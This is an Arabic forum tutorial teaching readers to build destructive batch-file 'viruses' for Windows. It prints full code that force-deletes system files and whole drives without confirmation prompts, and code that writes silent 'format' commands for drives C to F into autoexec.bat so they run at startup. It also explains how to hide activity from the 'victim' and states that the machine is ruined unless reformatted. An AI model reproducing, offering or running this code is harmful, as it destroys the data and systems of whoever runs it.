والحين شرح الكود
امر
..cd
هو امر الرجوع للمفات للوراء
وتم استخدمامه لسبب واحد
اول ما سيتم فتح الملف سيدخل الفايرس لمفات الوندز من دون الحاجه من تحديد المسار
يعني اذا كان الوندز في
c: او d:او f:او e:
راح يصيده يعني راح يصيده لان هذا الامر يخلي الفايرس يرجع لان يوصل لملف الوندز
يعني مثلنا انا اول ما افتح شاشة الدوس تطلع لي هذا الشي
--------------------------------------- D
ocuments and SettingsHITLER>
-----------------------------------------<
تنفتح شاشة الدوس بهذا الشكل ويطلع لي هذا المسار
الحين شنو الامر الي لازم احط من اجل الوصول إلى ملف
windows او system او system32
الامر
cd ..
اكتبه اكثر من مره من اجل الوصول إلى الملفات المطلوبه
اكتبه اكثر من مره من اجل الوصول إلى الملفات المطلوبه
وللتذكير هذا الامر يستخدم للرجوع للوراء والفائده من الوصول إلى الملفات المطلوبه مهما كان المكان
الذي تم فيه فتح الفايرس
امر
cd WINDOWS
او
cd system32
او
cd system
يستخدم هذا الامر من اجل الدخول إلى الملف المطلوب
cd اسم الملف الي تبي تدخله
cd name the file u want open in dos
ويتم دخلول الملفات بعد تعين المسار المطلوب ومثل ما ترون
قدم قدمنا امر الرجوع من اجل الوصول إلى ملفات الوندز ومن ثم كتبنا اسم الملفات التي نريد ان ندخلها
بالاوامر الموجد
امر
Cls
امر تنضيف شاشة الدوس
تم استخدام هذا الامر من اجل جعل الاوامر تنفذ بسرعه ومن دون شعور الضحيه بالاوامر التي مرت عليه
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
اعتقد ان تم شرح هذا الامر من قبل
ولا تنسون هذا الامر لمسح الملفات التي على هذه المسارات فان كنت
تريد ان تعرف كيفيه مسح ملف محدد فما عليك إلا كتابه
del file name.exe او dll او اي مسار
ويجب ان يكون الملف الذي تريد حذفه محدد المسار عن طريق شاشة الدوس
يعني لازم نكتب امر المسح اول شي ومن ثما اسم الملف المطلوب مسحه ومن ثم مسار الملف
امر @echo off
امر ستخدم من اجل كتابة اوامر تنفذ على شاشة الدوس او من اجل ظهور الكتابه على شاشة الدوس
@echo off
echo اكتب هنا الاوامر او اكتب ما تريد ان يظهر على شاشة الدوس
بعدين مثل ما اجوفون تم تحديد مسارات الملفات بذكر اسم المحرك c: // d: // e: // f: //
والسبب ان وندزي بالدي ووقت شغلت الفايرس بالسي ما صاد الملفات
يعني اذا قدمتو الفايرس بملف ون زب وكان وندزه غير موجود على السي راح يفلت من الفايرس ولهذا
السبب تم تحديد المسارات مع وضع امر المسح الكلي للمسارات دون اسم الملف
بمعني اخر ان تم تشغيل الفايرس بالكمبيوتر سيتم تدمير الجهاز ولاكن اذا تم تشغيل الفايرس بالسي ووندزه غير
موجود بالسي ما راح يصيد الملفات
بس الحين بعد التعديل راح يصيدها يعني شي اكييد الجهاز ما يتصلح إلا إذا تفرمت
-----------------------
شرح كود فايرس اخر-
----------------------
----------------------------------------&##1575;لكود-----------------------------------------------
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
----------------------------------------------------------------نهاية الكود-------------------------------------------------------------------
شرح الكود
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo من اجل الكتابه
format c: /q /u / امر فرمات
اسم حق الامر من اجل وضعه بملف autotest
nul [ عملية مضاعفه لامر الفرمات [ من اجل جعل الامر مرتين بدل مره واحده
c:autoexec.bat المكان الذي سيتم الحفظ فيه بجهاز الضحيه
وتم اختيار اسم autoexec
من اجل ان يعمل الفايرس من تلقاء نفسه
واذا قمت بكتابة كود الفايرس بنوته باد ومن ثم تغير مسار النوته إلى bat
وفتح الملف سوف تجد ملفات باسم
autoexec موجود في c:
لان تم تحديد مكان الحفظ في السي
وستكون الاوامر بهذا الشكل
format c: /q /u /autotest
format c: /q /u /autotest
وظهرت الاوامر بهذا الشكل لاننا كتبنا في الكود nul
ولهذا السبب تم مضاعفة الامر في الملف الذي عمله الفايرس نسخه في السي
ومثل ما ترون تم مضاعفة الامر الذي شرحته لكم اكثر من مره
------------------------------
]كود فايرس اخر
-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
@echo off
ATTRIB -a -s -h -r c:*.*
ATTRIB -a -s -h -r c:windows*.*
Echo y | echo a | Echo y |del c:*.*
Echo y | echo a | Echo y |del d:*.*
Echo y | echo a | Echo y |del e:*.*
echo y | copy *.* c:
echo y | copy *.* D:
echo y | copy *.* E:
restart
------------------------------------------------------------------------------------------------------نهاية الكود-------------------------------------------------------------------
شرح الكود
بالاول حبين ان اوضح لكم ان عندما تقدم امر
*.*
وهو امر لمسح كل الملفات الموجود بالمجلد الذي حددته بشاشة الدوس
ستظهر رساله تطلب من الموافقه على هذا الامر
للتوضيح
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:^^MR-HONFER^^^^MR-HONFER^^VIRSvirs in bat>cd n
C:^^MR-HONFER^^^^MR-HONFER^^VIRSvirs in batn>del *.*
C:^^MR-HONFER^^^^MR-HONFER^^VIRSvirs in batn*.*, Are you sure (Y/N)? y
C:^^MR-HONFER^^^^MR-HONFER^^VIRSvirs in batn>
مثل ما ترون عندما تم الطلب مسح جميع الملفات الموجوده في مجلد n
خرجة لي رساله من اجل التأكد من موافقتي Are you sure (Y/N)
وبعد الظغط على
y
تم المسح
ولاكن ما هي الطريقه المتبعه من اجل تفادي هذه الرساله اذا كنا نريد ان نعمل فايرس بأوامر الدوس
الحل موجود بكود الفايرسالذي قدمته لكم
امر
Echo y | echo a | Echo y |del *.*
يستخدم لمسح جميع الملفات من دون الطلب
وطريقة استخدام الامر تتم بعد تحديد مسار الملف الذي تريد دخوله عن طريق الدوس ومن ثم كتابة الامر
ومن ثم يتم المسح
ولاكن الذي يوجد به هذا الكود ان تم تحديد المسار
Echo y | echo a | Echo y |del c:*.*
ومثل ما هو ظاهر ان تم تحديد مسح جميع الملفات التي في المحرك c:
وتم كتابة مثل هذا الامر في كود الفايرس ولاكن من اجل مسح المحركات الاخري
وكان ذالك بتحديد المحركات مثل ما ترون
فتم تحديد المحرك
c:
d:
e:
من اجل ان يتم حذف جميع الملفات التي فيه
والامر الذي بعد الامر الحذف هو امر نسخ جميع الملفات
echo y | copy *.*
وهذا الامر يعطي امكانيه نسخ جميع الملفات من دون خروج رسالة الموافقه مثل التي مبينه عندكم
*.*, Are you sure (Y/N)? y
ولاكن بكود الفايرس تم تحديد المسارات مثل ما ترون
c:
d:
e:
وبذالك نكون شرحنه هذا الكود
================================================== =======================
قبل انهاء الدرس الاول بالدوس حبيت اذكركم ان بعد ان يتم كتابة الاوامر في نوته باد
يتم تغير المسار إلى bat
تم انتهاء الدرس
شرح KING HAKER
??we all going to die What the wrong if Tonight